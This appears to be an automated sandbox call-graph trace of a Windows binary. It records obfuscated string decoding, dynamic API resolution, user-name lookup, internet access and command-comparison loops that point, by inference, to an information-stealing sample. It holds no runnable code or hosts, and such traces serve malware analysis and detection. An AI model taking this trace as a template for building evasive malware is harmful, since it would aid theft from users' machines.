4024d7 9 API calls 60184->60185 60186 40273e 60185->60186 60187 4024d7 9 API calls 60186->60187 60188 40274f 60187->60188 60189 4024d7 9 API calls 60188->60189 60190 402760 60189->60190 60191 4024d7 9 API calls 60190->60191 60192 402771 60191->60192 60193 4024d7 9 API calls 60192->60193 60194 402782 60193->60194 60195 4024d7 9 API calls 60194->60195 60196 402793 60195->60196 60197 4024d7 9 API calls 60196->60197 60198 4027a4 60197->60198 60199 4024d7 9 API calls 60198->60199 60200 4027b5 60199->60200 60201 4024d7 9 API calls 60200->60201 60202 4027c6 60201->60202 60203 4024d7 9 API calls 60202->60203 60204 4027d7 60203->60204 60205 4024d7 9 API calls 60204->60205 60206 4027e8 60205->60206 60207 417330 LoadLibraryA 60206->60207 60208 417348 60207->60208 60209 41753a LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 60207->60209 60216 417369 20 API calls 60208->60216 60210 417598 GetProcAddress 60209->60210 60211 4175aa 60209->60211 60210->60211 60212 4175b3 GetProcAddress GetProcAddress 60211->60212 60213 4175dc 60211->60213 60212->60213 60214 4175e5 GetProcAddress 60213->60214 60215 4175f7 60213->60215 60214->60215 60217 417600 GetProcAddress 60215->60217 60218 417612 60215->60218 60216->60209 60217->60218 60219 417262 60218->60219 60220 41761b GetProcAddress GetProcAddress 60218->60220 60221 40f923 60219->60221 60220->60219 60222 40f931 60221->60222 60223 40f953 60222->60223 60224 40f949 lstrcpy 60222->60224 60225 40fbcb GetProcessHeap HeapAlloc GetUserNameA 60223->60225 60224->60223 60225->60112 60228 40fadc 60226->60228 60227 40fb01 60227->60115 60228->60227 60229 40faee lstrcpy lstrcat 60228->60229 60229->60227 60231 40f9f7 60230->60231 60232 40fa20 60231->60232 60233 40fa18 lstrcpy 60231->60233 60232->60120 60233->60232 60235 416973 60234->60235 60236 40f923 lstrcpy 60235->60236 60237 416986 60236->60237 60446 4134fd _EH_prolog 60237->60446 60239 416996 60448 4135ac _EH_prolog 60239->60448 60241 4169a5 60450 40f997 lstrlenA 60241->60450 60244 40f997 2 API calls 60245 4169c9 60244->60245 60454 4027ef 60245->60454 60251 416aba 60252 40f9e1 lstrcpy 60251->60252 60253 416acc 60252->60253 60254 40f923 lstrcpy 60253->60254 60255 416aeb 60254->60255 60256 40fa9c 4 API calls 60255->60256 60257 416b04 60256->60257 61044 40fa28 _EH_prolog 60257->61044 60260 40f9e1 lstrcpy 60261 416b2d 60260->60261 60262 416b54 CreateDirectoryA 60261->60262 61048 4010b1 _EH_prolog 60262->61048 60270 416b9d 60271 40f9e1 lstrcpy 60270->60271 60272 416baf 60271->60272 60273 40f9e1 lstrcpy 60272->60273 60274 416bc1 60273->60274 61171 40f95a 60274->61171 60277 40fa9c 4 API calls 60278 416be5 60277->60278 60279 40f9e1 lstrcpy 60278->60279 60280 416bf2 60279->60280 60281 40fa28 3 API calls 60280->60281 60282 416c11 60281->60282 60283 40f9e1 lstrcpy 60282->60283 60284 416c1e 60283->60284 60285 416c39 InternetOpenA 60284->60285 61175 40fb4d 60285->61175 60287 416c55 InternetOpenA 60288 40f95a lstrcpy 60287->60288 60289 416c85 60288->60289 60290 40f923 lstrcpy 60289->60290 60291 416c9c 60290->60291 61176 4104dd _EH_prolog GetWindowsDirectoryA 60291->61176 60294 40f95a lstrcpy 60295 416cc5 60294->60295 61195 403af5 _EH_prolog 60295->61195 60297 416ccf 61331 411cd8 _EH_prolog 60297->61331 60299 416cd7 60300 40f923 lstrcpy 60299->60300 60301 416d0b 60300->60301 60302 4010b1 2 API calls 60301->60302 60303 416d23 60302->60303 61351 40514c _EH_prolog 60303->61351 60305 416d2d 61530 411715 _EH_prolog 60305->61530 60307 416d35 60308 40f923 lstrcpy 60307->60308 60309 416d5d 60308->60309 60310 4010b1 2 API calls 60309->60310 60311 416d75 60310->60311 60312 40514c 46 API calls 60311->60312 60313 416d7f 60312->60313 61538 4114ee _EH_prolog 60313->61538 60315 416d87 60316 40f923 lstrcpy 60315->60316 60317 416daf 60316->60317 60318 4010b1 2 API calls 60317->60318 60319 416dc7 60318->60319 60320 40514c 46 API calls 60319->60320 60321 416dd1 60320->60321 61549 411649 _EH_prolog 60321->61549 60323 416dd9 60324 4010b1 2 API calls 60323->60324 60325 416ded 60324->60325 61558 414604 _EH_prolog 60325->61558 60328 40f95a lstrcpy 60329 416e06 60328->60329 60330 40f923 lstrcpy 60329->60330 60331 416e20 60330->60331 61900 4041b2 _EH_prolog 60331->61900 60333 416e29 60334 4010b1 2 API calls 60333->60334 60335 416e61 60334->60335 61919 40ed08 _EH_prolog 60335->61919 60424->60121 60430 40245c 60425->60430 60429 402536 memset 60429->60130 60442 4181c0 60430->60442 60435 410b12 60436 4024be CryptStringToBinaryA 60435->60436 60437 4024d0 strcat GetProcessHeap RtlAllocateHeap 60436->60437 60438 402308 60437->60438 60439 40231b 60438->60439 60440 40238b ??_U@YAPAXI 60439->60440 60441 4023a6 60440->60441 60441->60429 60443 402469 memset 60442->60443 60444 410b12 60443->60444 60445 40249e CryptStringToBinaryA 60444->60445 60445->60435 60447 413513 60446->60447 60447->60239 60449 4135c2 60448->60449 60449->60241 60451 40f9af 60450->60451 60452 40f9da 60451->60452 60453 40f9d0 lstrcpy 60451->60453 60452->60244 60453->60452 60455 4024d7 9 API calls 60454->60455 60456 4027f9 60455->60456 60457 4024d7 9 API calls 60456->60457 60458 40280a 60457->60458 60459 4024d7 9 API calls 60458->60459 60460 40281b 60459->60460 60461 4024d7 9 API calls 60460->60461 60462 40282c 60461->60462 60463 4024d7 9 API calls 60462->60463 60464 40283d 60463->60464 60465 4024d7 9 API calls 60464->60465 60466 40284e 60465->60466 60467 4024d7 9 API calls 60466->60467 60468 40285f 60467->60468 60469 4024d7 9 API calls 60468->60469 60470 402870 60469->60470 60471 4024d7 9 API calls 60470->60471 60472 402881 60471->60472 60473 4024d7 9 API calls 60472->60473 60474 402892 60473->60474 60475 4024d7 9 API calls 60474->60475 60476 4028a3 60475->60476 60477 4024d7 9 API calls 60476->60477 60478 4028b4 60477->60478 60479 4024d7 9 API calls 60478->60479 60480 4028c5 60479->60480 60481 4024d7 9 API calls 60480->60481 60482 4028d6 60481->60482 60483 4024d7 9 API calls 60482->60483 60484 4028e7 60483->60484 60485 4024d7 9 API calls 60484->60485 60486 4028f8 60485->60486 60487 4024d7 9 API calls 60486->60487 60488 402909 60487->60488 60489 4024d7 9 API calls 60488->60489 60490 40291a 60489->60490 60491 4024d7 9 API calls 60490->60491 60492 40292b 60491->60492 60493 4024d7 9 API calls 60492->60493 60494 40293c 60493->60494 60495 4024d7 9 API calls 60494->60495 60496 40294d 60495->60496 60497 4024d7 9 API calls 60496->60497 60498 40295e 60497->60498 60499 4024d7 9 API calls 60498->60499 60500 40296f 60499->60500 60501 4024d7 9 API calls 60500->60501 60502 402980 60501->60502 60503 4024d7 9 API calls 60502->60503 60504 402991 60503->60504 60505 4024d7 9 API calls 60504->60505 60506 4029a2 60505->60506 60507 4024d7 9 API calls 60506->60507 60508 4029b3 60507->60508 60509 4024d7 9 API calls 60508->60509 60510 4029c4 60509->60510 60511 4024d7 9 API calls 60510->60511 60512 4029d5 60511->60512 60513 4024d7 9 API calls 60512->60513 60514 4029e6 60513->60514 60515 4024d7 9 API calls 60514->60515 60516 4029f7 60515->60516 60517 4024d7 9 API calls 60516->60517 60518 402a08 60517->60518 60519 4024d7 9 API calls 60518->60519 60520 402a19 60519->60520 60521 4024d7 9 API calls 60520->60521 60522 402a2a 60521->60522 60523 4024d7 9 API calls 60522->60523 60524 402a3b 60523->60524 60525 4024d7 9 API calls 60524->60525 60526 402a4c 60525->60526 60527 4024d7 9 API calls 60526->60527 60528 402a5d 60527->60528 60529 4024d7 9 API calls 60528->60529 60530 402a6e 60529->60530 60531 4024d7 9 API calls 60530->60531 60532 402a7f 60531->60532 60533 4024d7 9 API calls 60532->60533 60534 402a90 60533->60534 60535 4024d7 9 API calls 60534->60535 60536 402aa1 60535->60536 60537 4024d7 9 API calls 60536->60537 60538 402ab2 60537->60538 60539 4024d7 9 API calls 60538->60539 60540 402ac3 60539->60540 60541 4024d7 9 API calls 60540->60541 60542 402ad4 60541->60542 60543 4024d7 9 API calls 60542->60543 60544 402ae5 60543->60544 60545 4024d7 9 API calls 60544->60545 60546 402af6 60545->60546 60547 4024d7 9 API calls 60546->60547 60548 402b07 60547->60548 60549 4024d7 9 API calls 60548->60549 60550 402b18 60549->60550 60551 4024d7 9 API calls 60550->60551 60552 402b29 60551->60552 60553 4024d7 9 API calls 60552->60553 60554 402b3a 60553->60554 60555 4024d7 9 API calls 60554->60555 60556 402b4b 60555->60556 60557 4024d7 9 API calls 60556->60557 60558 402b5c 60557->60558 60559 4024d7 9 API calls 60558->60559 60560 402b6d 60559->60560 60561 4024d7 9 API calls 60560->60561 60562 402b7e 60561->60562 60563 4024d7 9 API calls 60562->60563 60564 402b8f 60563->60564 60565 4024d7 9 API calls 60564->60565 60566 402ba0 60565->60566 60567 4024d7 9 API calls 60566->60567 60568 402bb1 60567->60568 60569 4024d7 9 API calls 60568->60569 60570 402bc2 60569->60570 60571 4024d7 9 API calls 60570->60571 60572 402bd3 60571->60572 60573 4024d7 9 API calls 60572->60573 60574 402be4 60573->60574 60575 4024d7 9 API calls 60574->60575 60576 402bf5 60575->60576 60577 4024d7 9 API calls 60576->60577 60578 402c06 60577->60578 60579 4024d7 9 API calls 60578->60579 60580 402c17 60579->60580 60581 4024d7 9 API calls 60580->60581 60582 402c28 60581->60582 60583 4024d7 9 API calls 60582->60583 60584 402c39 60583->60584 60585 4024d7 9 API calls 60584->60585 60586 402c4a 60585->60586 60587 4024d7 9 API calls 60586->60587 60588 402c5b 60587->60588 60589 4024d7 9 API calls 60588->60589 60590 402c6c 60589->60590 60591 4024d7 9 API calls 60590->60591 60592 402c7d 60591->60592 60593 4024d7 9 API calls 60592->60593 60594 402c8e 60593->60594 60595 4024d7 9 API calls 60594->60595 60596 402c9f 60595->60596 60597 4024d7 9 API calls 60596->60597 60598 402cb0 60597->60598 60599 4024d7 9 API calls 60598->60599 60600 402cc1 60599->60600 60601 4024d7 9 API calls 60600->60601 60602 402cd2 60601->60602 60603 4024d7 9 API calls 60602->60603 60604 402ce3 60603->60604 60605 4024d7 9 API calls 60604->60605 60606 402cf4 60605->60606 60607 4024d7 9 API calls 60606->60607 60608 402d05 60607->60608 60609 4024d7 9 API calls 60608->60609 60610 402d16 60609->60610 60611 4024d7 9 API calls 60610->60611 60612 402d27 60611->60612 60613 4024d7 9 API calls 60612->60613 60614 402d38 60613->60614 60615 4024d7 9 API calls 60614->60615 60616 402d49 60615->60616 60617 4024d7 9 API calls 60616->60617 60618 402d5a 60617->60618 60619 4024d7 9 API calls 60618->60619 60620 402d6b 60619->60620 60621 4024d7 9 API calls 60620->60621 60622 402d7c 60621->60622 60623 4024d7 9 API calls 60622->60623 60624 402d8d 60623->60624 60625 4024d7 9 API calls 60624->60625 60626 402d9e 60625->60626 60627 4024d7 9 API calls 60626->60627 60628 402daf 60627->60628 60629 4024d7 9 API calls 60628->60629 60630 402dc0 60629->60630 60631 4024d7 9 API calls 60630->60631 60632 402dd1 60631->60632 60633 4024d7 9 API calls 60632->60633 60634 402de2 60633->60634 60635 4024d7 9 API calls 60634->60635 60636 402df3 60635->60636 60637 4024d7 9 API calls 60636->60637 60638 402e04 60637->60638 60639 4024d7 9 API calls 60638->60639 60640 402e15 60639->60640 60641 4024d7 9 API calls 60640->60641 60642 402e26 60641->60642 60643 4024d7 9 API calls 60642->60643 60644 402e37 60643->60644 60645 4024d7 9 API calls 60644->60645 60646 402e48 60645->60646 60647 4024d7 9 API calls 60646->60647 60648 402e59 60647->60648 60649 4024d7 9 API calls 60648->60649 60650 402e6a 60649->60650 60651 4024d7 9 API calls 60650->60651 60652 402e7b 60651->60652 60653 4024d7 9 API calls 60652->60653 60654 402e8c 60653->60654 60655 4024d7 9 API calls 60654->60655 60656 402e9d 60655->60656 60657 4024d7 9 API calls 60656->60657 60658 402eae 60657->60658 60659 4024d7 9 API calls 60658->60659 60660 402ebf 60659->60660 60661 4024d7 9 API calls 60660->60661 60662 402ed0 60661->60662 60663 4024d7 9 API calls 60662->60663 60664 402ee1 60663->60664 60665 4024d7 9 API calls 60664->60665 60666 402ef2 60665->60666 60667 4024d7 9 API calls 60666->60667 60668 402f03 60667->60668 60669 4024d7 9 API calls 60668->60669 60670 402f14 60669->60670 60671 4024d7 9 API calls 60670->60671 60672 402f25 60671->60672 60673 4024d7 9 API calls 60672->60673 60674 402f36 60673->60674 60675 4024d7 9 API calls 60674->60675 60676 402f47 60675->60676 60677 4024d7 9 API calls 60676->60677 60678 402f58 60677->60678 60679 4024d7 9 API calls 60678->60679 60680 402f69 60679->60680 60681 4024d7 9 API calls 60680->60681 60682 402f7a 60681->60682 60683 4024d7 9 API calls 60682->60683 60684 402f8b 60683->60684 60685 4024d7 9 API calls 60684->60685 60686 402f9c 60685->60686 60687 4024d7 9 API calls 60686->60687 60688 402fad 60687->60688 60689 4024d7 9 API calls 60688->60689 60690 402fbe 60689->60690 60691 4024d7 9 API calls 60690->60691 60692 402fcf 60691->60692 60693 4024d7 9 API calls 60692->60693 60694 402fe0 60693->60694 60695 4024d7 9 API calls 60694->60695 60696 402ff1 60695->60696 60697 4024d7 9 API calls 60696->60697 60698 403002 60697->60698 60699 4024d7 9 API calls 60698->60699 60700 403013 60699->60700 60701 4024d7 9 API calls 60700->60701 60702 403024 60701->60702 60703 4024d7 9 API calls 60702->60703 60704 403035 60703->60704 60705 4024d7 9 API calls 60704->60705 60706 403046 60705->60706 60707 4024d7 9 API calls 60706->60707 60708 403057 60707->60708 60709 4024d7 9 API calls 60708->60709 60710 403068 60709->60710 60711 4024d7 9 API calls 60710->60711 60712 403079 60711->60712 60713 4024d7 9 API calls 60712->60713 60714 40308a 60713->60714 60715 4024d7 9 API calls 60714->60715 60716 40309b 60715->60716 60717 4024d7 9 API calls 60716->60717 60718 4030ac 60717->60718 60719 4024d7 9 API calls 60718->60719 60720 4030bd 60719->60720 60721 4024d7 9 API calls 60720->60721 60722 4030ce 60721->60722 60723 4024d7 9 API calls 60722->60723 60724 4030df 60723->60724 60725 4024d7 9 API calls 60724->60725 60726 4030f0 60725->60726 60727 4024d7 9 API calls 60726->60727 60728 403101 60727->60728 60729 4024d7 9 API calls 60728->60729 60730 403112 60729->60730 60731 4024d7 9 API calls 60730->60731 60732 403123 60731->60732 60733 4024d7 9 API calls 60732->60733 60734 403134 60733->60734 60735 4024d7 9 API calls 60734->60735 60736 403145 60735->60736 60737 4024d7 9 API calls 60736->60737 60738 403156 60737->60738 60739 4024d7 9 API calls 60738->60739 60740 403167 60739->60740 60741 4024d7 9 API calls 60740->60741 60742 403178 60741->60742 60743 4024d7 9 API calls 60742->60743 60744 403189 60743->60744 60745 4024d7 9 API calls 60744->60745 60746 40319a 60745->60746 60747 4024d7 9 API calls 60746->60747 60748 4031ab 60747->60748 60749 4024d7 9 API calls 60748->60749 60750 4031bc 60749->60750 60751 4024d7 9 API calls 60750->60751 60752 4031cd 60751->60752 60753 4024d7 9 API calls 60752->60753 60754 4031de 60753->60754 60755 4024d7 9 API calls 60754->60755 60756 4031ef 60755->60756 60757 4024d7 9 API calls 60756->60757 60758 403200 60757->60758 60759 4024d7 9 API calls 60758->60759 60760 403211 60759->60760 60761 4024d7 9 API calls 60760->60761 60762 403222 60761->60762 60763 4024d7 9 API calls 60762->60763 60764 403233 60763->60764 60765 4024d7 9 API calls 60764->60765 60766 403244 60765->60766 60767 4024d7 9 API calls 60766->60767 60768 403255 60767->60768 60769 4024d7 9 API calls 60768->60769 60770 403266 60769->60770 60771 4024d7 9 API calls 60770->60771 60772 403277 60771->60772 60773 4024d7 9 API calls 60772->60773 60774 403288 60773->60774 60775 4024d7 9 API calls 60774->60775 60776 403299 60775->60776 60777 4024d7 9 API calls 60776->60777 60778 4032aa 60777->60778 60779 4024d7 9 API calls 60778->60779 60780 4032bb 60779->60780 60781 4024d7 9 API calls 60780->60781 60782 4032cc 60781->60782 60783 4024d7 9 API calls 60782->60783 60784 4032dd 60783->60784 60785 4024d7 9 API calls 60784->60785 60786 4032ee 60785->60786 60787 4024d7 9 API calls 60786->60787 60788 4032ff 60787->60788 60789 4024d7 9 API calls 60788->60789 60790 403310 60789->60790 60791 4024d7 9 API calls 60790->60791 60792 403321 60791->60792 60793 4024d7 9 API calls 60792->60793 60794 403332 60793->60794 60795 4024d7 9 API calls 60794->60795 60796 403343 60795->60796 60797 4024d7 9 API calls 60796->60797 60798 403354 60797->60798 60799 4024d7 9 API calls 60798->60799 60800 403365 60799->60800 60801 4024d7 9 API calls 60800->60801 60802 403376 60801->60802 60803 4024d7 9 API calls 60802->60803 60804 403387 60803->60804 60805 4024d7 9 API calls 60804->60805 60806 403398 60805->60806 60807 4024d7 9 API calls 60806->60807 60808 4033a9 60807->60808 60809 4024d7 9 API calls 60808->60809 60810 4033ba 60809->60810 60811 4024d7 9 API calls 60810->60811 60812 4033cb 60811->60812 60813 4024d7 9 API calls 60812->60813 60814 4033dc 60813->60814 60815 4024d7 9 API calls 60814->60815 60816 4033ed 60815->60816 60817 4024d7 9 API calls 60816->60817 60818 4033fe 60817->60818 60819 4024d7 9 API calls 60818->60819 60820 40340f 60819->60820 60821 4024d7 9 API calls 60820->60821 60822 403420 60821->60822 60823 4024d7 9 API calls 60822->60823 60824 403431 60823->60824 60825 4024d7 9 API calls 60824->60825 60826 403442 60825->60826 60827 4024d7 9 API calls 60826->60827 60828 403453 60827->60828 60829 4024d7 9 API calls 60828->60829 60830 403464 60829->60830 60831 4024d7 9 API calls 60830->60831 60832 403475 60831->60832 60833 4024d7 9 API calls 60832->60833 60834 403486 60833->60834 60835 4024d7 9 API calls 60834->60835 60836 403497 60835->60836 60837 4024d7 9 API calls 60836->60837 60838 4034a8 60837->60838 60839 4024d7 9 API calls 60838->60839 60840 4034b9 60839->60840 60841 4024d7 9 API calls 60840->60841 60842 4034ca 60841->60842 60843 4024d7 9 API calls 60842->60843 60844 4034db 60843->60844 60845 4024d7 9 API calls 60844->60845 60846 4034ec 60845->60846 60847 4024d7 9 API calls 60846->60847 60848 4034fd 60847->60848 60849 4024d7 9 API calls 60848->60849 60850 40350e 60849->60850 60851 4024d7 9 API calls 60850->60851 60852 40351f 60851->60852 60853 4024d7 9 API calls 60852->60853 60854 403530 60853->60854 60855 4024d7 9 API calls 60854->60855 60856 403541 60855->60856 60857 4024d7 9 API calls 60856->60857 60858 403552 60857->60858 60859 4024d7 9 API calls 60858->60859 60860 403563 60859->60860 60861 4024d7 9 API calls 60860->60861 60862 403574 60861->60862 60863 4024d7 9 API calls 60862->60863 60864 403585 60863->60864 60865 4024d7 9 API calls 60864->60865 60866 403596 60865->60866 60867 4024d7 9 API calls 60866->60867 60868 4035a7 60867->60868 60869 4024d7 9 API calls 60868->60869 60870 4035b8 60869->60870 60871 4024d7 9 API calls 60870->60871 60872 4035c9 60871->60872 60873 4024d7 9 API calls 60872->60873 60874 4035da 60873->60874 60875 4024d7 9 API calls 60874->60875 60876 4035eb 60875->60876 60877 4024d7 9 API calls 60876->60877 60878 4035fc 60877->60878 60879 4024d7 9 API calls 60878->60879 60880 40360d 60879->60880 60881 4024d7 9 API calls 60880->60881 60882 40361e 60881->60882 60883 4024d7 9 API calls 60882->60883 60884 40362f 60883->60884 60885 4024d7 9 API calls 60884->60885 60886 403640 60885->60886 60887 4024d7 9 API calls 60886->60887 60888 403651 60887->60888 60889 4024d7 9 API calls 60888->60889 60890 403662 60889->60890 60891 4024d7 9 API calls 60890->60891 60892 403673 60891->60892 60893 4024d7 9 API calls 60892->60893 60894 403684 60893->60894 60895 4024d7 9 API calls 60894->60895 60896 403695 60895->60896 60897 4024d7 9 API calls 60896->60897 60898 4036a6 60897->60898 60899 4024d7 9 API calls 60898->60899 60900 4036b7 60899->60900 60901 4024d7 9 API calls 60900->60901 60902 4036c8 60901->60902 60903 4024d7 9 API calls 60902->60903 60904 4036d9 60903->60904 60905 4024d7 9 API calls 60904->60905 60906 4036ea 60905->60906 60907 4024d7 9 API calls 60906->60907 60908 4036fb 60907->60908 60909 4024d7 9 API calls 60908->60909 60910 40370c 60909->60910 60911 4024d7 9 API calls 60910->60911 60912 40371d 60911->60912 60913 4024d7 9 API calls 60912->60913 60914 40372e 60913->60914 60915 4024d7 9 API calls 60914->60915 60916 40373f 60915->60916 60917 4024d7 9 API calls 60916->60917 60918 403750 60917->60918 60919 4024d7 9 API calls 60918->60919 60920 403761 60919->60920 60921 4024d7 9 API calls 60920->60921 60922 403772 60921->60922 60923 4024d7 9 API calls 60922->60923 60924 403783 60923->60924 60925 4024d7 9 API calls 60924->60925 60926 403794 60925->60926 60927 4024d7 9 API calls 60926->60927 60928 4037a5 60927->60928 60929 4024d7 9 API calls 60928->60929 60930 4037b6 60929->60930 60931 4024d7 9 API calls 60930->60931 60932 4037c7 60931->60932 60933 4024d7 9 API calls 60932->60933 60934 4037d8 60933->60934 60935 4024d7 9 API calls 60934->60935 60936 4037e9 60935->60936 60937 4024d7 9 API calls 60936->60937 60938 4037fa 60937->60938 60939 4024d7 9 API calls 60938->60939 60940 40380b 60939->60940 60941 4024d7 9 API calls 60940->60941 60942 40381c 60941->60942 60943 4024d7 9 API calls 60942->60943 60944 40382d 60943->60944 60945 4024d7 9 API calls 60944->60945 60946 40383e 60945->60946 60947 4024d7 9 API calls 60946->60947 60948 40384f 60947->60948 60949 4024d7 9 API calls 60948->60949 60950 403860 60949->60950 60951 4024d7 9 API calls 60950->60951 60952 403871 60951->60952 60953 4024d7 9 API calls 60952->60953 60954 403882 60953->60954 60955 4024d7 9 API calls 60954->60955 60956 403893 60955->60956 60957 4024d7 9 API calls 60956->60957 60958 4038a4 60957->60958 60959 4024d7 9 API calls 60958->60959 60960 4038b5 60959->60960 60961 4024d7 9 API calls 60960->60961 60962 4038c6 60961->60962 60963 4024d7 9 API calls 60962->60963 60964 4038d7 60963->60964 60965 4024d7 9 API calls 60964->60965 60966 4038e8 60965->60966 60967 4024d7 9 API calls 60966->60967 60968 4038f9 60967->60968 60969 4024d7 9 API calls 60968->60969 60970 40390a 60969->60970 60971 4024d7 9 API calls 60970->60971 60972 40391b 60971->60972 60973 4024d7 9 API calls 60972->60973 60974 40392c 60973->60974 60975 4024d7 9 API calls 60974->60975 60976 40393d 60975->60976 60977 4024d7 9 API calls 60976->60977 60978 40394e 60977->60978 60979 4024d7 9 API calls 60978->60979 60980 40395f 60979->60980 60981 4024d7 9 API calls 60980->60981 60982 403970 60981->60982 60983 4024d7 9 API calls 60982->60983 60984 403981 60983->60984 60985 4024d7 9 API calls 60984->60985 60986 403992 60985->60986 60987 4024d7 9 API calls 60986->60987 60988 4039a3 60987->60988 60989 4024d7 9 API calls 60988->60989 60990 4039b4 60989->60990 60991 4024d7 9 API calls 60990->60991 60992 4039c5 60991->60992 60993 4024d7 9 API calls 60992->60993 60994 4039d6 60993->60994 60995 4024d7 9 API calls 60994->60995 60996 4039e7 60995->60996 60997 4024d7 9 API calls 60996->60997 60998 4039f8 60997->60998 60999 4024d7 9 API calls 60998->60999 61000 403a09 60999->61000 61001 4024d7 9 API calls 61000->61001 61002 403a1a 61001->61002 61003 4024d7 9 API calls 61002->61003 61004 403a2b 61003->61004 61005 4024d7 9 API calls 61004->61005 61006 403a3c 61005->61006 61007 4024d7 9 API calls 61006->61007 61008 403a4d 61007->61008 61009 417645 61008->61009 61010 417652 43 API calls 61009->61010 61011 417a2a 9 API calls 61009->61011 61010->61011 61012 417b39 61011->61012 61013 417acb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 61011->61013 61014 417b46 8 API calls 61012->61014 61015 417bf9 61012->61015 61013->61012 61014->61015 61016 417c70 61015->61016 61017 417c02 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 61015->61017 61018 417d02 61016->61018 61019 417c7d 6 API calls 61016->61019 61017->61016 61020 417dd9 61018->61020 61021 417d0f 9 API calls 61018->61021 61019->61018 61022 417e50 61020->61022 61023 417de2 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 61020->61023 61021->61020 61024 417e82 61022->61024 61025 417e59 GetProcAddress GetProcAddress 61022->61025 61023->61022 61026 417eb4 61024->61026 61027 417e8b GetProcAddress GetProcAddress 61024->61027 61025->61024 61028 417ec1 10 API calls 61026->61028 61029 417fa0 61026->61029 61027->61026 61028->61029 61030 418000 61029->61030 61031 417fa9 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 61029->61031 61032 418009 GetProcAddress 61030->61032 61033 41801b 61030->61033 61031->61030 61032->61033 61034 418024 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 61033->61034 61035 41807b 61033->61035 61034->61035 61036 416aac 61035->61036 61037 418084 GetProcAddress 61035->61037 61038 410b5c _EH_prolog 61036->61038 61037->61036 61039 40f923 lstrcpy 61038->61039 61040 410b83 61039->61040 61041 40f923 lstrcpy 61040->61041 61042 410b9a GetSystemTime 61041->61042 61043 410bb8 61042->61043 61043->60251 61046 40fa65 61044->61046 61045 40fa89 61045->60260 61046->61045 61047 40fa77 lstrcpy lstrcat 61046->61047 61047->61045 61049 40f95a lstrcpy 61048->61049 61050 4010cc 61049->61050 61051 40f95a lstrcpy 61050->61051 61052 4010dc 61051->61052 61053 40f95a lstrcpy 61052->61053 61054 4010ec 61053->61054 61055 40f95a lstrcpy 61054->61055 61056 401108 61055->61056 61057 41390c _EH_prolog 61056->61057 61058 4135ac _EH_prolog 61057->61058 61059 413932 61058->61059 61060 40f997 2 API calls 61059->61060 61061 413946 61060->61061 61062 40f997 2 API calls 61061->61062 61063 413953 61062->61063 61064 40f997 2 API calls 61063->61064 61065 413960 61064->61065 61066 40f923 lstrcpy 61065->61066 61067 413970 61066->61067 61068 40f923 lstrcpy 61067->61068 61069 413981 61068->61069 61070 40f923 lstrcpy 61069->61070 61071 413992 61070->61071 61072 40f923 lstrcpy 61071->61072 61073 4139a3 61072->61073 61074 40f923 lstrcpy 61073->61074 61075 4139b4 61074->61075 61076 40f923 lstrcpy 61075->61076 61161 4139c5 61076->61161 61077 4020f9 lstrcpy 61077->61161 61079 40212d lstrcpy 61079->61161 61080 413adc StrCmpCA 61080->61161 61081 413b5d StrCmpCA 61083 41435b 61081->61083 61081->61161 61082 40f95a lstrcpy 61082->61161 61084 40f9e1 lstrcpy 61083->61084 61085 41436a 61084->61085 62194 40212d 61085->62194 61088 413d0a StrCmpCA 61090 414316 61088->61090 61088->61161 61089 40f9e1 lstrcpy 61091 414381 61089->61091 61093 40f9e1 lstrcpy 61090->61093 62197 402286 lstrcpy 61091->62197 61092 402147 lstrcpy 61092->61161 61094 414325 61093->61094 62192 40217b lstrcpy 61094->62192 61098 41432e 61100 40f9e1 lstrcpy 61098->61100 61099 414396 61101 40f9e1 lstrcpy 61099->61101 61103 41433c 61100->61103 61104 4143a4 61101->61104 61102 413eb7 StrCmpCA 61105 4142d1 61102->61105 61102->61161 62193 4022a0 lstrcpy 61103->62193 62198 4132d9 lstrcpy _EH_prolog 61104->62198 61106 40f9e1 lstrcpy 61105->61106 61107 4142e0 61106->61107 62190 4021c9 lstrcpy 61107->62190 61112 4142e9 61114 40f9e1 lstrcpy 61112->61114 61113 414261 61116 40f9e1 lstrcpy 61113->61116 61117 4142f7 61114->61117 61115 414064 StrCmpCA 61118 41428f 61115->61118 61115->61161 61120 41426f 61116->61120 62191 4022ba lstrcpy 61117->62191 61121 40f9e1 lstrcpy 61118->61121 61119 4021e3 lstrcpy 61119->61161 62187 4132d9 lstrcpy _EH_prolog 61120->62187 61123 41429e 61121->61123 61122 413c89 StrCmpCA 61122->61161 62188 402217 lstrcpy 61123->62188 61124 40f9e1 lstrcpy 61124->61161 61125 402195 lstrcpy 61125->61161 61129 40217b lstrcpy 61129->61161 61131 4142a7 61134 40f9e1 lstrcpy 61131->61134 61132 41420b StrCmpCA 61135 414226 61132->61135 61136 414216 Sleep 61132->61136 61133 4010b1 _EH_prolog lstrcpy 61133->61161 61137 4142b5 61134->61137 61139 40f9e1 lstrcpy 61135->61139 61136->61161 62189 4022d4 lstrcpy 61137->62189 61138 402231 lstrcpy 61138->61161 61141 414235 61139->61141 61140 413118 33 API calls 61140->61161 62185 402265 lstrcpy 61141->62185 61142 413e36 StrCmpCA 61142->61161 61146 41428a 61149 413295 _EH_prolog 61146->61149 61147 41423e 61150 40f9e1 lstrcpy 61147->61150 61148 4021c9 lstrcpy 61148->61161 61151 41441b 61149->61151 61152 41424c 61150->61152 62179 401061 _EH_prolog 61151->62179 62186 4022ee lstrcpy 61152->62186 61154 414427 61162 4136b3 61154->61162 61155 413fe3 StrCmpCA 61155->61161 61157 41303a 28 API calls 61157->61161 61158 402217 lstrcpy 61158->61161 61159 414190 StrCmpCA 61159->61161 61160 402265 lstrcpy 61160->61161 61161->61077 61161->61079 61161->61080 61161->61081 61161->61082 61161->61088 61161->61092 61161->61102 61161->61115 61161->61119 61161->61122 61161->61124 61161->61125 61161->61129 61161->61132 61161->61133 61161->61138 61161->61140 61161->61142 61161->61148 61161->61155 61161->61157 61161->61158 61161->61159 61161->61160 62176 402113 61161->62176 62181 402161 lstrcpy 61161->62181 62182 4021af lstrcpy 61161->62182 62183 4021fd lstrcpy 61161->62183 62184 40224b lstrcpy 61161->62184 61163 40f9e1 lstrcpy 61162->61163 61164 4136c3 61163->61164 61165 40f9e1 lstrcpy 61164->61165 61166 4136cf 61165->61166 61167 40f9e1 lstrcpy 61166->61167 61168 4136db 61167->61168 61169 413295 _EH_prolog 61168->61169 61170 4132b5 61169->61170 61170->60270 61172 40f971 